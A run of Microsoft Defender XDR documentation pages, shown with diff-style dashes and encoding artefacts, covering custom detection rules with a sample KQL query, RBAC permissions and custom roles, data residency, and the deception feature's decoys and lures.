-* **Marketing software:** Software that monitors and transmits the activities of users to applications or services other than itself for marketing research.
-
-* **Evasion software:** Software that actively tries to evade detection by security products, including software that behaves differently in the presence of security products.
-
-* **Poor industry reputation:** Software that trusted security providers detect with their security products. The security industry is dedicated to protecting customers and improving their experiences. Microsoft and other organizations in the security industry continuously exchange knowledge about files we have analyzed to provide users with the best possible protection.
-
security Custom Detection Rules https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/custom-detection-rules.md
- Title: Create and manage custom detection rules in Microsoft Defender XDR
-description: Learn how to create and manage custom detections rules based on advanced hunting queries.
--
- - NOCSH
----
- - m365-security
- - m365initiative-m365-defender
- - tier2
- Previously updated : 03/28/2024--
-# Create and manage custom detections rules
--
-**Applies to:**
-- Microsoft Defender XDR-
-Custom detection rules are rules you can design and tweak using [advanced hunting](advanced-hunting-overview.md) queries. These rules let you proactively monitor various events and system states, including suspected breach activity and misconfigured endpoints. You can set them to run at regular intervals, generating alerts and taking response actions whenever there are matches.
-
-## Required permissions for managing custom detections
-
-To manage custom detections, you need to be assigned one of these roles:
--- **Security settings (manage)**ΓÇöUsers with this [Microsoft Defender XDR permission](/microsoft-365/security/defender/manage-rbac) can manage security settings in the Microsoft Defender portal.-- **Security administrator**ΓÇöUsers with this [Microsoft Entra role](/azure/active-directory/roles/permissions-reference#security-administrator) can manage security settings in the Microsoft Defender portal and other portals and services.--- **Security operator**ΓÇöUsers with this [Microsoft Entra role](/azure/active-directory/roles/permissions-reference#security-operator) can manage alerts and have global read-only access to security-related features, including all information in the Microsoft Defender portal. This role is sufficient for managing custom detections only if role-based access control (RBAC) is turned off in Microsoft Defender for Endpoint. If you have RBAC configured, you also need the **manage security settings** permission for Defender for Endpoint.-
-You can also manage custom detections that apply to data from specific Microsoft Defender XDR solutions if you have permissions for them. If you only have manage permissions for Microsoft Defender for Office 365, for instance, you can create custom detections using `Email` tables but not `Identity` tables.
--
-> [!NOTE]
-> To manage custom detections, **security operators** will need the **manage security settings** permission in Microsoft Defender for Endpoint if RBAC is turned on.
-
-To manage required permissions, a **global administrator** can:
--- Assign the **security administrator** or **security operator** role in [Microsoft 365 admin center](https://admin.microsoft.com/) under **Roles** \> **Security admin**.-- Check RBAC settings for Microsoft Defender for Endpoint in [Microsoft Defender XDR](https://security.microsoft.com/) under **Settings** \> **Permissions** > **Roles**. Select the corresponding role to assign the **manage security settings** permission.-
-> [!NOTE]
-> A user also needs to have the appropriate permissions for the devices in the [device scope](#5-set-the-rule-scope) of a custom detection rule that they are creating or editing before they can proceed. A user can't edit a custom detection rule that is scoped to run on all devices, if the same user does not permissions for all devices.
---
-## Create a custom detection rule
-
-### 1. Prepare the query
-
-In the Microsoft Defender portal, go to **Advanced hunting** and select an existing query or create a new query. When using a new query, run the query to identify errors and understand possible results.
-
-> [!IMPORTANT]
-> To prevent the service from returning too many alerts, each rule is limited to generating only 100 alerts whenever it runs. Before creating a rule, tweak your query to avoid alerting for normal, day-to-day activity.
-
-#### Required columns in the query results
-
-To create a custom detection rule, the query must return the following columns:
--- `Timestamp`ΓÇöused to set the timestamp for generated alerts-- `ReportId`ΓÇöenables lookups for the original records-- One of the following columns that identify specific devices, users, or mailboxes:
- - `DeviceId`
- - `DeviceName`
- - `RemoteDeviceName`
- - `RecipientEmailAddress`
- - `SenderFromAddress` (envelope sender or Return-Path address)
- - `SenderMailFromAddress` (sender address displayed by email client)
- - `RecipientObjectId`
- - `AccountObjectId`
- - `AccountSid`
- - `AccountUpn`
- - `InitiatingProcessAccountSid`
- - `InitiatingProcessAccountUpn`
- - `InitiatingProcessAccountObjectId`
-
-> [!NOTE]
-> Support for additional entities will be added as new tables are added to the [advanced hunting schema](advanced-hunting-schema-tables.md).
-
-Simple queries, such as those that don't use the `project` or `summarize` operator to customize or aggregate results, typically return these common columns.
-
-There are various ways to ensure more complex queries return these columns. For example, if you prefer to aggregate and count by entity under a column such as `DeviceId`, you can still return `Timestamp` and `ReportId` by getting it from the most recent event involving each unique `DeviceId`.
-
-> [!IMPORTANT]
-> Avoid filtering custom detections using the `Timestamp` column. The data used for custom detections is pre-filtered based on the detection frequency.
-
-The sample query below counts the number of unique devices (`DeviceId`) with antivirus detections and uses this count to find only the devices with more than five detections. To return the latest `Timestamp` and the corresponding `ReportId`, it uses the `summarize` operator with the `arg_max` function.
-
-```kusto
-DeviceEvents
-| where ingestion_time() > ago(1d)
-| where ActionType == "AntivirusDetection"
-| summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count() by DeviceId
-| where count_ > 5
-```
-
-> [!TIP]
-> For better query performance, set a time filter that matches your intended run frequency for the rule. Since the least frequent run is _every 24 hours_, filtering for the past day will cover all new data.
-
-### 2. Create new rule and provide alert details
-
-With the query in the query editor, select **Create detection rule** and specify the following alert details:
--- **Detection name**ΓÇöname of the detection rule; should be unique-- **Frequency**ΓÇöinterval for running the query and taking action. [See more guidance in the rule frequency section](#rule-frequency)-- **Alert title**ΓÇötitle displayed with alerts triggered by the rule; should be unique-- **Severity**ΓÇöpotential risk of the component or activity identified by the rule-- **Category**ΓÇöthreat component or activity identified by the rule-- **MITRE ATT&CK techniques**ΓÇöone or more attack techniques identified by the rule as documented in the [MITRE ATT&CK framework](https://attack.mitre.org/). This section is hidden for certain alert categories, including malware, ransomware, suspicious activity, and unwanted software-- **Description**ΓÇömore information about the component or activity identified by the rule-- **Recommended actions**ΓÇöadditional actions that responders might take in response to an alert-
-#### Rule frequency
-
-When you save a new rule, it runs and checks for matches from the past 30 days of data. The rule then runs again at fixed intervals, applying a lookback duration based on the frequency you choose:
--- **Every 24 hours**ΓÇöruns every 24 hours, checking data from the past 30 days-- **Every 12 hours**ΓÇöruns every 12 hours, checking data from the past 48 hours-- **Every 3 hours**ΓÇöruns every 3 hours, checking data from the past 12 hours-- **Every hour**ΓÇöruns hourly, checking data from the past 4 hours-- **Continuous (NRT)**ΓÇöruns continuously, checking data from events as they're collected and processed in near real-time (NRT), see [Continuous (NRT) frequency](custom-detection-rules.md#continuous-nrt-frequency)-
-> [!TIP]
-> Match the time filters in your query with the lookback duration. Results outside of the lookback duration are ignored.
-
-When you edit a rule, it will run with the applied changes in the next run time scheduled according to the frequency you set. The rule frequency is based on the event timestamp and not the ingestion time.
--
-##### Continuous (NRT) frequency
-
-Setting a custom detection to run in Continuous (NRT) frequency allows you to increase your organization's ability to identify threats faster.
-
-> [!NOTE]
-> Using the Continuous (NRT) frequency has minimal to no impact to your resource usage and should thus be considered for any qualified custom detection rule in your organization.
-
-###### Queries you can run continuously
-
-You can run a query continuously as long as:
-- The query references one table only.-- The query uses an operator from the list of supported KQL operators. **[Supported KQL features](/azure/azure-monitor/essentials/data-collection-transformations-structure#supported-kql-features)**-- The query doesn't use joins, unions, or the `externaldata` operator.-
-###### Tables that support Continuous (NRT) frequency
-
-Near real-time detections are supported for the following tables:
--- `AlertEvidence`-- `CloudAppEvents`-- `DeviceEvents`-- `DeviceFileCertificateInfo`-- `DeviceFileEvents`-- `DeviceImageLoadEvents`-- `DeviceLogonEvents`-- `DeviceNetworkEvents`-- `DeviceNetworkInfo`-- `DeviceInfo`-- `DeviceProcessEvents`-- `DeviceRegistryEvents`-- `EmailAttachmentInfo`-- `EmailEvents` (except `LatestDeliveryLocation` and `LatestDeliveryAction` columns)-- `EmailPostDeliveryEvents`-- `EmailUrlInfo`-- `IdentityDirectoryEvents`-- `IdentityLogonEvents`-- `IdentityQueryEvents`-- `UrlClickEvents`--
-> [!NOTE]
-> Only columns that are generally available can support **Continuous (NRT)** frequency.
---
-### 3. Choose the impacted entities
-
-Identify the columns in your query results where you expect to find the main affected or impacted entity. For example, a query might return sender (`SenderFromAddress` or `SenderMailFromAddress`) and recipient (`RecipientEmailAddress`) addresses. Identifying which of these columns represent the main impacted entity helps the service aggregate relevant alerts, correlate incidents, and target response actions.
-
-You can select only one column for each entity type (mailbox, user, or device). Columns that aren't returned by your query can't be selected.
-
-### 4. Specify actions
-
-Your custom detection rule can automatically take actions on devices, files, users, or emails that are returned by the query.
--
-#### Actions on devices
-
-These actions are applied to devices in the `DeviceId` column of the query results:
--- **Isolate device**ΓÇöuses Microsoft Defender for Endpoint to apply full network isolation, preventing the device from connecting to any application or service. [Learn more about Microsoft Defender for Endpoint machine isolation](/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-devices-from-the-network)-- **Collect investigation package**ΓÇöcollects device information in a ZIP file. [Learn more about the Microsoft Defender for Endpoint investigation package](/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#collect-investigation-package-from-devices)-- **Run antivirus scan**ΓÇöperforms a full Microsoft Defender Antivirus scan on the device-- **Initiate investigation**ΓÇöinitiates an [automated investigation](m365d-autoir.md) on the device-- **Restrict app execution**ΓÇösets restrictions on device to allow only files that are signed with a Microsoft-issued certificate to run. [Learn more about app restrictions with Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/respond-machine-alerts#restrict-app-execution)-
-#### Actions on files
--- When selected, the **Allow/Block** action can be applied to the file. Blocking files are only allowed if you have *Remediate* permissions for files and if the query results have identified a file ID, such as an SHA1. Once a file is blocked, other instances of the same file in all devices are also blocked. You can control which device group the blocking is applied to, but not specific devices.--- When selected, the **Quarantine file** action can be applied to files in the `SHA1`, `InitiatingProcessSHA1`, `SHA256`, or `InitiatingProcessSHA256` column of the query results. This action deletes the file from its current location and places a copy in quarantine.-
-#### Actions on users
--- When selected, the **Mark user as compromised** action is taken on users in the `AccountObjectId`, `InitiatingProcessAccountObjectId`, or `RecipientObjectId` column of the query results. This action sets the users risk level to "high" in Microsoft Entra ID, triggering corresponding [identity protection policies](/azure/active-directory/identity-protection/overview-identity-protection).--- Select **Disable user** to temporarily prevent a user from logging in.-- Select **Force password reset** to prompt the user to change their password on the next sign in session.-
-Both the `Disable user` and `Force password reset` options require the user SID, which are in the columns `AccountSid`, `InitiatingProcessAccountSid`, `RequestAccountSid`, and `OnPremSid`.
-
-For more details on user actions, read [Remediation actions in Microsoft Defender for Identity](/defender-for-identity/remediation-actions).
-
-#### Actions on emails
--- If the custom detection yields email messages, you can select **Move to mailbox folder** to move the email to a selected folder (any of **Junk**, **Inbox**, or **Deleted items** folders).--- Alternatively, you can select **Delete email** and then choose to either move the emails to Deleted Items (**Soft delete**) or delete the selected emails permanently (**Hard delete**).--
-The columns `NetworkMessageId` and `RecipientEmailAddress` must be present in the output results of the query to apply actions to email messages.
--
-### 5. Set the rule scope
-
-Set the scope to specify which devices are covered by the rule. The scope influences rules that check devices and doesn't affect rules that check only mailboxes and user accounts or identities.
-
-When setting the scope, you can select:
--- All devices-- Specific device groups-
-Only data from devices in the scope will be queried. Also, actions are taken only on those devices.
-
-> [!NOTE]
-> Users are able to create or edit a custom detection rule only if they have the corresponding permissions for the devices included in the scope of the rule. For instance, admins can only create or edit rules that are scoped to all device groups if they have permissions for all device groups.
---
-### 6. Review and turn on the rule
-
-After reviewing the rule, select **Create** to save it. The custom detection rule immediately runs. It runs again based on configured frequency to check for matches, generate alerts, and take response actions.
-
-> [!IMPORTANT]
-> Custom detections should be regularly reviewed for efficiency and effectiveness. To make sure you are creating detections that trigger true alerts, take time to review your existing custom detections by following the steps in [Manage existing custom detect ion rules](#manage-existing-custom-detection-rules).
->
-> You maintain control over the broadness or specificity of your custom detections so any false alerts generated by custom detections might indicate a need to modify certain parameters of the rules.
-
-## Manage existing custom detection rules
-
-You can view the list of existing custom detection rules, check their previous runs, and review the alerts that were triggered. You can also run a rule on demand and modify it.
-
-> [!TIP]
-> Alerts raised by custom detections are available over alerts and incident APIs. For more information, see [Supported Microsoft Defender XDR APIs](api-supported.md).
-
-### View existing rules
-
-To view all existing custom detection rules, navigate to **Hunting** > **Custom detection rules**. The page lists all the rules with the following run information:
--- **Last run**ΓÇöwhen a rule was last run to check for query matches and generate alerts-- **Last run status**ΓÇöwhether a rule ran successfully-- **Next run**ΓÇöthe next scheduled run-- **Status**ΓÇöwhether a rule has been turned on or off-
-### View rule details, modify rule, and run rule
-
-To view comprehensive information about a custom detection rule, go to **Hunting** > **Custom detection rules** and then select the name of rule. You can then view general information about the rule, including information, its run status, and scope. The page also provides the list of triggered alerts and actions.
--
-You can also take the following actions on the rule from this page:
--- **Run**ΓÇörun the rule immediately. This also resets the interval for the next run.-- **Edit**ΓÇömodify the rule without changing the query-- **Modify query**ΓÇöedit the query in advanced hunting-- **Turn on** / **Turn off**ΓÇöenable the rule or stop it from running-- **Delete**ΓÇöturn off the rule and remove it--
-### View and manage triggered alerts
-
-In the rule details screen (**Hunting** \> **Custom detections** \> **[Rule name]**), go to **Triggered alerts**, which lists the alerts generated by matches to the rule. Select an alert to view detailed information about it and take the following actions:
--- Manage the alert by setting its status and classification (true or false alert)-- Link the alert to an incident-- Run the query that triggered the alert on advanced hunting-
-### Review actions
-
-In the rule details screen (**Hunting** \> **Custom detections** \> **[Rule name]**), go to **Triggered actions**, which lists the actions taken based on matches to the rule.
-
-> [!TIP]
-> To quickly view information and take action on an item in a table, use the selection column [&#10003;] at the left of the table.
-
-> [!NOTE]
-> Some columns in this article might not be available in Microsoft Defender for Endpoint. [Turn on Microsoft Defender XDR](m365d-enable.md) to hunt for threats using more data sources. You can move your advanced hunting workflows from Microsoft Defender for Endpoint to Microsoft Defender XDR by following the steps in [Migrate advanced hunting queries from Microsoft Defender for Endpoint](advanced-hunting-migrate-from-mde.md).
-
-## See also
--- [Custom detections overview](custom-detections-overview.md)-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the advanced hunting query language](advanced-hunting-query-language.md)-- [Migrate advanced hunting queries from Microsoft Defender for Endpoint](advanced-hunting-migrate-from-mde.md)-- [Microsoft Graph security API for custom detections](/graph/api/resources/security-api-overview?view=graph-rest-beta&preserve-view=true#custom-detections)-
security Custom Detections Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/custom-detections-overview.md
- Title: Overview of custom detections in Microsoft Defender XDR
-description: Understand how you can use advanced hunting to create custom detections and generate alerts
--
- - NOCSH
----
- - m365-security
- - tier2
- Previously updated : 02/16/2021--
-# Custom detections overview
---
-**Applies to:**
-- Microsoft Defender XDR-
-With custom detections, you can proactively monitor for and respond to various events and system states, including suspected breach activity and misconfigured endpoints. This is made possible by customizable detection rules that automatically trigger alerts as well as response actions.
-
-Custom detections work with [advanced hunting](advanced-hunting-overview.md), which provides a powerful, flexible query language that covers a broad set of event and system information from your network. You can set them to run at regular intervals, generating alerts and taking response actions whenever there are matches.
-
-Custom detections provide:
-- Alerts for rule-based detections built from advanced hunting queries-- Automatic response actions-
-## See also
-- [Create and manage custom detection rules](custom-detection-rules.md)-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Migrate advanced hunting queries from Microsoft Defender for Endpoint](advanced-hunting-migrate-from-mde.md)-- [Microsoft Graph security API for custom detections](/graph/api/resources/security-api-overview?view=graph-rest-beta&preserve-view=true#custom-detections)
security Custom Permissions Details https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/custom-permissions-details.md
- Title: Details of custom permissions in Microsoft Defender XDR Unified role-based access control (RBAC)
-description: Learn about the custom permissions available in Microsoft Defender XDR Security role-based access control (RBAC)
------- m365-security-- tier3-- Previously updated : 08/03/2023---
-# Permissions in Microsoft Defender XDR Unified role-based access control (RBAC)
-
-In Microsoft Defender XDR Unified role-based access control (RBAC) you can select permissions from each permission group to customize a role.
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Identity](https://go.microsoft.com/fwlink/?LinkID=2198108)-- [Microsoft Defender for Office 365 P2](https://go.microsoft.com/fwlink/?LinkID=2158212)-- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Cloud](/azure/defender-for-cloud/defender-for-cloud-introduction)-
-<a name='microsoft-365-defender-unified-rbac-permission-details'></a>
-
-## Microsoft Defender XDR Unified RBAC permission details
-
-The following table lists the permissions available to configure for your users based on the tasks they need to do:
-
-> [!NOTE]
-> Unless otherwise stated, all permissions are applicable to all supported workloads and will be applied to the data scope selected during the data source and assignment stage.
-
-### Security operations ΓÇô Security data
-
-Permissions for managing day-to-day operations and responding to incidents and advisories.
-
-|Permission name|Level|Description|
-||||
-|Security data basics|Read|View info about incidents, alerts, investigations, advanced hunting, devices, submissions, evaluation lab, and reports.|
-|Alerts|Manage|Manage alerts, start automated investigations, run scans, collect investigation packages, and manage device tags.|
-|Response|Manage|Take response actions, approve or dismiss pending remediation actions, and manage blocked and allowed lists for automation.|
-|Basic live response|Manage|Initiate a live response session, download files, and perform read-only actions on devices remotely.|
-|Advanced live response|Manage|Create live response sessions and perform advanced actions, including uploading files and running scripts on devices remotely.|
-|File collection|Manage|Collect or download relevant files for analysis, including executable files.|
-|Email & collaboration quarantine|Manage|View and release email from quarantine.|
-|Email & collaboration advanced actions|Manage|Move or Delete email to the junk email folder, deleted items or inbox, including soft and hard delete of email.|
-
-### Security operations ΓÇô Raw data (Email & collaboration)
-
-|Permission name|Level|Description|
-|||||
-|Email & collaboration metadata|Read|View email and collaboration data in a hunting scenarios, including advanced hunting, threat explorer, campaigns, and email entity.|
-|Email & collaboration content|Read|View and download email content and attachments.|
-
-### Security posture ΓÇô Posture management
-
-Permissions for managing the organization's security posture and performing vulnerability management.
-
-|Permission name|Level|Description|
-||||
-|Vulnerability management|Read|View Defender Vulnerability Management data for the following: software and software inventory, weaknesses, missing KBs, advanced hunting, security baselines assessment, and devices.|
-|Exception handling|Manage|Create security recommendation exceptions and manage active exceptions in Defender Vulnerability Management.|
-|Remediation handling|Manage|Create remediation tickets, submit new requests, and manage remediation activities in Defender Vulnerability Management.|
-|Application handling|Manage|Manage vulnerable applications and software, including blocking and unblocking them in Defender Vulnerability Management.|
-|Security baseline assessment|Manage|Create and manage profiles so you can assess if your devices comply to security industry baselines.|
-|Secure Score|Read / Manage|Manage permissions to Secure Score data including which users have access to the data and the products for which they will see Secure Score data.|
-
-### Authorization and settings
-
-Permissions to manages the security and system settings and to create and assign roles.
-
-|Permission name|Level|Description|
-||||
-|Authorization|Read / Manage|View or manage device groups, and custom and built-in roles.|
-|Core security settings|Read / Manage|View or manage core security settings for the Microsoft Defender portal.|
-|Detection tuning| Manage |Manage tasks related to detections in the Microsoft Defender portal including Custom detections, Alerts Tuning and Threat Indicators of compromise.|
-|System settings|Read / Manage|View or manage general systems settings for the Microsoft Defender portal.|
-
-## Next steps
--- [Create custom roles](create-custom-rbac-roles.md)-- [Activate Microsoft Defender XDR Unified RBAC](activate-defender-rbac.md)
security Custom Roles https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/custom-roles.md
- Title: Custom roles for role-based access control
-description: Learn how to manage custom roles in the Microsoft Defender portal
-
- - NOCSH
-- Previously updated : 03/04/2024---- m365-security-- tier3-
- - MOE150
- - MET150
-
-# Custom roles in role-based access control for Microsoft Defender XDR
-
-> [!NOTE]
-> Microsoft Defender XDR users can now take advantage of a centralized permissions management solution to control user access and permissions across different Microsoft security solutions. Learn more about the [Microsoft Defender XDR Unified role-based access control (RBAC)](manage-rbac.md).
--
-**Applies to:**
--- Microsoft Defender XDR--
-There are two types of roles that can be used to access to Microsoft Defender XDR:
--- **Global Microsoft Entra roles**-- **Custom roles**-
-Access to Microsoft Defender XDR can be managed collectively by using [Global roles in Microsoft Entra ID](m365d-permissions.md)
-
-If you need greater flexibility and control over access to specific product data, Microsoft Defender XDR access can also be managed with the creation of Custom roles through each respective security portal.
-
-For example, a Custom role created through Microsoft Defender for Endpoint would allow access to the relevant product data, including Endpoint data within the Microsoft Defender portal. Similarly, a Custom role created through Microsoft Defender for Office 365 would allow access to the relevant product data, including Email & collaboration data within the Microsoft Defender portal.
-
-Users with existing Custom roles may access data in the Microsoft Defender portal according to their existing workload permissions with no additional configuration required.
-
-## Create and manage custom roles
-
-Custom roles and permissions can be created and individually managed through each of the following security portals:
--- Microsoft Defender for Endpoint ΓÇô [Edit roles in Microsoft Defender for Endpoint](../defender-endpoint/user-roles.md)-- Microsoft Defender for Office 365 ΓÇô [Permissions in the Security & Compliance Center](../office-365-security/scc-permissions.md?preserve-view=true&view=o365-worldwide)-- Microsoft Defender for Cloud Apps ΓÇô [Manage admin access](/cloud-app-security/manage-admins)-
-Each custom role created through an individual portal allows access to the data of the relevant product portal. For example, a custom role created through Microsoft Defender for Endpoint will only allow access to Defender for Endpoint data.
-
-> [!TIP]
-> Permissions and roles can also be accessed through the Microsoft Defender portal by selecting Permissions & roles from the navigation pane. Access to Microsoft Defender for Cloud Apps is managed through the Defender for Cloud Apps portal and controls access to Microsoft Defender for Identity as well. See [Microsoft Defender for Cloud Apps](/cloud-app-security/manage-admins)
-
-> [!NOTE]
-> Custom roles created in Microsoft Defender for Cloud Apps have access to Microsoft Defender for Identity data as well. Users with User group admin, or App/instance admin Microsoft Defender for Cloud Apps roles are not able to access Microsoft Defender for Cloud Apps data through the Microsoft Defender portal.
-
-<a name='manage-permissions-and-roles-in-the-microsoft-365-defender-portal'></a>
-
-## Manage permissions and roles in the Microsoft Defender portal
-
-Permissions and roles can also be managed in the Microsoft Defender portal:
-
-1. Sign in to the Microsoft Defender portal at security.microsoft.com.
-2. In the navigation pane, select **Permissions & roles**.
-3. Under the **Permissions** header, select **Roles**.
-
-> [!NOTE]
-> This only applies to Defender for Office 365 and Defender for Endpoint. Access for other workloads must be done in their relevant portals.
-
-## Required roles and permissions
-
-The following table outlines the roles and permissions required to access each unified experience in each workload. Roles defined in the table below refer to custom roles in individual portals and are not connected to global roles in Microsoft Entra ID, even if similarly named.
-
-> [!NOTE]
-> Incident management requires management permissions for all products that are part of the incident.
-
-|Microsoft Defender XDR workload|One of the following roles is required for Defender for Endpoint|One of the following roles is required for Defender for Office 365|One of the following roles is required for Defender for Cloud Apps|
-|||||
-|Viewing investigation data: <ul><li>Alert page</li> <li>Alerts queue</li> <li>Incidents</li> <li>Incident queue</li> <li>Action center</li></ul>|View data- security operations|<ul><li>View-only Manage alerts </li> <li>Organization configuration</li><li>Audit logs</li> <li>View-only audit logs</li> <li>Security reader</li> <li>Security admin</li><li>View-only recipients</li></ul>|<ul><li>Global admin</li> <li>Security admin</li> <li>Compliance admin</li> <li>Security operator</li> <li>Security reader</li> <li>Global reader</li></ul>|
-|Viewing hunting data, saving, editing, and deleting hunting queries and functions|View data- security operations|<ul><li>Security reader</li> <li>Security admin</li> <li>View-only recipients</li>|<ul><li>Global admin</li> <li>Security admin</li> <li>Compliance admin</li> <li>Security operator</li> <li>Security reader</li> <li>Global reader</li></ul>|
-|Managing alerts and incidents|Alerts investigation|<ul><li>Manage alerts</li> <li>Security admin</li>|<ul><li>Global admin</li> <li>Security admin</li> <li>Compliance admin</li> <li>Security operator</li> <li>Security reader</li></ul>|
-|Action center remediation|Active remediation actions ΓÇô security operations|Search and purge||
-|Setting custom detections|Manage security settings|<ul><li>Manage alerts</li> <li>Security admin</li></ul>|<ul><li>Global admin</li> <li>Security admin</li> <li>Compliance admin</li> <li>Security operator</li> <li>Security reader</li> <li>Global reader</li></ul>|
-|Threat Analytics|Alerts and incidents data: <ul><li>View data- security operations</li></ul>Defender Vulnerability Management mitigations:<ul><li>View data - Threat and vulnerability management</li></ul>|Alerts and incidents data:<ul> <li>View-only Manage alerts</li> <li>Manage alerts</li> <li>Organization configuration</li><li>Audit logs</li> <li>View-only audit logs</li><li>Security reader</li> <li>Security admin</li><li>View-only recipients</li> </ul> Prevented email attempts: <ul><li>Security reader</li> <li>Security admin</li><li>View-only recipients</li>|Not available for Defender for Cloud Apps or MDI users|
-
-For example, to view hunting data from Microsoft Defender for Endpoint, View data security operations permissions are required.
-
-Similarly, to view hunting data from Microsoft Defender for Office 365, users would require one of the following roles:
--- View data security operations-- Security reader-- Security admin-- View-only recipients-
-## Related topics
--- [RBAC roles](../office-365-security/migrate-to-defender-for-office-365-onboard.md#rbac-roles)-- [Manage access to Microsoft Defender XDR](m365d-permissions.md)-- [Manage admin access for Defender for Cloud Apps](/cloud-app-security/manage-admins)
security Data Privacy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/data-privacy.md
- Title: Microsoft Defender XDR data security and privacy
-description: Describes the privacy and data security of the service.
-
- - NOCSH
------ m365-security-- tier2-- essentials-security-- essentials-privacy-- essentials-compliance-
- - MOE150
- - MET150
Previously updated : 02/16/2021--
-# Microsoft Defender XDR data security and privacy
---
-**Applies to:**
-- Microsoft Defender XDR-
-Microsoft Defender XDR operates in Microsoft Azure data centers in the European Union, the United Kingdom, the United States, and in Australia. Customer data collected by the service is stored at rest in (a) the geo-location of the tenant as identified during provisioning or, (b) the geo-location as defined by the data storage rules of an online service if this online service is used by Microsoft Defender XDR to process such data.
-
-Customer data in pseudonymized form might also be stored in central storage and processing systems in the United States.
-
-For more information on the data storage and privacy information of the specific products, see:
-- [Microsoft Defender for Endpoint data storage and privacy](/windows/security/threat-protection/microsoft-defender-atp/data-storage-privacy)-- [Microsoft Defender for Cloud Apps data security and privacy](/cloud-app-security/cas-compliance-trust)-- [Microsoft Defender for Identity data security and privacy](/defender-for-identity/privacy-compliance)-- [Microsoft 365 privacy, security, and transparency](/office365/servicedescriptions/office-365-platform-service-description/privacy-security-and-transparency#advanced-threat-protection)
security Deception Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/deception-overview.md
- Title: Manage the deception capability in Microsoft Defender XDR
-description: Detect human-operated attacks with lateral movement in the early stages using high confidence signals from the deception feature in Microsoft Defender XDR.
-
- - NOCSH
----
- - m365-security
- - tier1
-
- - MOE150
- - MET150
Previously updated : 11/14/2023--
-# Manage the deception capability in Microsoft Defender XDR
--
-**Applies to:**
--- Microsoft Defender XDR-- Microsoft Defender for Endpoint-
-> [!IMPORTANT]
-> Some information in this article relates to prereleased products/services that might be substantially modified before commercially release. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-Microsoft Defender XDR, through built-in deception capability, delivers high confidence detections of human-operated lateral movement, preventing attacks from reaching an organization's critical assets. Various attacks like [business email compromise (BEC)](https://www.microsoft.com/security/business/security-101/what-is-business-email-compromise-bec), [ransomware](/security/ransomware/), organizational breaches, and nation-state attacks often use lateral movement and can be hard to detect with high confidence in the early stages. Defender XDR's deception technology provides high confidence detections based on deception signals correlated with Microsoft Defender for Endpoint signals.
-
-The deception capability automatically generates authentic-looking decoy accounts, hosts, and lures. The fake assets generated are then automatically deployed to specific clients. When an attacker interacts with the decoys or lures, the deception capability raises high confidence alerts, helping in security team's investigations and allowing them to observe an attacker's methods and strategies. All alerts raised by the deception capability are automatically correlated into incidents and are fully integrated into Microsoft Defender XDR. In addition, the deception technology is integrated into Defender for Endpoint, minimizing deployment needs.
-
-This article gives you an overview of Defender XDR's deception technology, prerequisites, and additional resources.
-
-## Prerequisites
-
-The following table lists the requirements to enable the deception capability in Microsoft Defender XDR.
-
-> [!div class="mmx-tdCol2BreakAll"]
-> |Requirement|Details|
-> |-|-|
-> |Subscription requirements|One of these subscriptions:</br> - Microsoft 365 E5</br> - Microsoft Security E5</br> - Microsoft Defender for Endpoint Plan 2|
-> |Deployment requirements|Requirements:</br> - Defender for Endpoint is the primary EDR solution</br> - [Automated investigation and response capabilities in Defender for Endpoint](/microsoft-365/security/defender-endpoint/configure-automated-investigations-remediation) is configured</br> - Devices are [joined](/entra/identity/devices/concept-directory-join/) or [hybrid joined](/entra/identity/devices/concept-hybrid-join/) in Microsoft Entra</br> - PowerShell is enabled on the devices</br> - The deception feature covers clients operating on Windows 10 RS5 and later in preview|
-> |Permissions|You must have one of the following roles assigned in the [Microsoft Entra admin center](https://entra.microsoft.com) or in the [Microsoft 365 admin center](https://admin.microsoft.com) to configure deception capabilities:</br> - Global administrator</br> - Security administrator|
-
-## What is deception technology?
-
-Deception technology is a security measure that provides immediate alerts of a potential attack to security teams, allowing them to respond in real-time. Deception technology creates fake assets like devices, users, and hosts that appear to belong to your network.
-
-Attackers interacting with the fake network assets set up by the deception capability can help security teams prevent potential attacks from compromising an organization and monitor the attackers' actions so defenders can improve their environment's security further.
-
-### How does the Microsoft Defender XDR deception capability work?
-
-The built-in deception capability in the Microsoft Defender portal uses rules to make decoys and lures that match your environment. The feature applies machine learning to suggest decoys and lures that are tailored to your network. You can also use the deception feature to manually create the decoys and lures. These decoys and lures are then automatically deployed to your network and planted to devices you specify using PowerShell.
-
-*Figure 1. Deception technology, through high confidence detections of human-operated lateral movement, alerts security teams when an attacker interacts with fake hosts or lures*
-
-**Decoys** are fake devices and accounts that appear to belong to your network. **Lures** are fake content planted on specific devices or accounts and are used to attract an attacker. The content can be a document, a configuration file, cached credentials, or any content that an attacker can likely read, steal, or interact with. Lures imitate important company information, settings, or credentials.
-
-There are two types of lures available in the deception feature:
--- Basic lures ΓÇô planted documents, link files, and the like that have no or minimal interaction with the customer environment. -- Advanced lures ΓÇô planted content like cached credentials and interceptions that respond or interact with the customer environment. For example, attackers might interact with decoy credentials that were injected responses to Active Directory queries, which can be used to sign in.-
-> [!NOTE]
-> Lures are only planted on Windows clients defined in the scope of a deception rule. However, attempts to use any decoy host or account on any Defender for Endpoint-onboarded client raises a deception alert. Learn how to onboard clients in [Onboard to Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/onboarding). Planting lures on Windows Server 2016 and later is planned for future development.
-
-You can specify decoys, lures, and the scope in a deception rule. See [Configure the deception feature](configure-deception.md) to learn more about how to create and modify deception rules.
-
